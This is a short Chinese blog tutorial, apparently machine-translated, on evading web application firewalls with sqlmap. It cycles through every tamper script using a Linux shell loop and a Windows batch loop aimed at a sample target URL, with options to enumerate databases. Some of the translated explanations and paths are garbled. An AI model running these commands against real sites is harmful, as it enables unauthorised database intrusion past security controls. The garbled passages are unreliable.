waf(网络应用程序防火墙)方法被sqlmap粗略地绕过

作者: hmseo688 分类: 心得分享 发布时间: 2019-03-24 08:06

在许多情况下,我们可以通过使用sqlmap中的篡改脚本更有效地攻击目标。篡改脚本修改我们发出的请求,以防止它被WAF(网络应用程序防火墙)拦截。在某些情况下,您可能需要合并一些脚本才能通过WAF。

脚本地址的完整列表在sqlmap/tamper中。

使用方法是添加参数-篡改名称。Py或- tamper name1。Py, name2。Py, name3。Py……

1. Linux下的Sqlmap /篡改脚本位置:

linux下tamper脚本位置

2. Sqlmap /篡改脚本位置在win:

win下sqlmap/tamper脚本位置

从上面的图中可以看出:有这么多篡改脚本,Linux如何才能快速找到正确的脚本?

一个接一个地尝试是不是太累人、太费力了,而且有些人很难准确地记住每个篡改脚本的作用?Toast的lostwolf编写了一个sh命令,该命令依次使用kali下的每个篡改脚本来找到合适的脚本。

sh语句是:

for t in `ls /usr/share/sqlmap/tamper/*.py`; do echo -e "e[41;1m tamper: $te[0m"; sqlmap -u "http://192.168.1.100/sql.asp?id=1" --dbs --random-agent --smart --batch --tamper $t --threads 10;done;

研究结果如下:

使用每个tamper脚本,从而找到合适的

Sh声明:

——随机代理参数;随机代理随机代理报头;

智能手机之路;

——批量选择默认接收输入;

Echo -e “e[41; 100万篡改:$te[0m”;将当前使用的篡改脚本显示为红色和白色文本。

如果是在窗户里呢?

我用下面的命令写了一个批处理(sqlmap路径位置改变):

for /f "delims=" %%i in ('dir /b D:sqlmap amper*.py') do d:sqlmapsqlmap.py -u "http://192.168.1.100/sql.asp?id=1" --dbs --random-agent --smart --batch --tamper %%i --threads 10

sqlmap批处理命令windos

当然,这种方法也有缺陷。它将粗略地调用每个篡改脚本一次,并且不会组合用于测试的脚本。因此,如果您能够理解每个篡改脚本的功能并准确地调用它,将会节省大量的工作和时间。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云